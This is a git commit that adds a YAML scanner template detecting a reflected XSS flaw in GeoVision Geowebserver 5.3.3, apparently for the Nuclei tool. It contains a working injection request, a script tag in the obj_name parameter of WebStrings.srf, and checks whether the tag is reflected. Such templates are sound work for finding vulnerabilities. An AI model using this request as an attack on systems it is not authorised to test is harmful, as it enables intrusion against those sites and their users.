Create geovision-geowebserver-xss.yaml

patch-1
SaN ThosH 2021-08-18 03:50:39 +05:30 committed by GitHub
parent 5b17aea895
commit 0c24cc2f74
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: geowebserver-xss
info:
name: GeoVision Geowebserver 5.3.3 - XSS
author: madrobot
severity: medium
reference: https://www.exploit-db.com/exploits/50211
tags: geowebserver,xss
requests:
- raw:
- |
GET /Visitor/bin/WebStrings.srf?file=&obj_name=<script>test</script> HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: */*
matchers-condition: and
matchers:
- type: regex
regex:
- "<script>test</script>"
part: body
- type: status
status:
- 200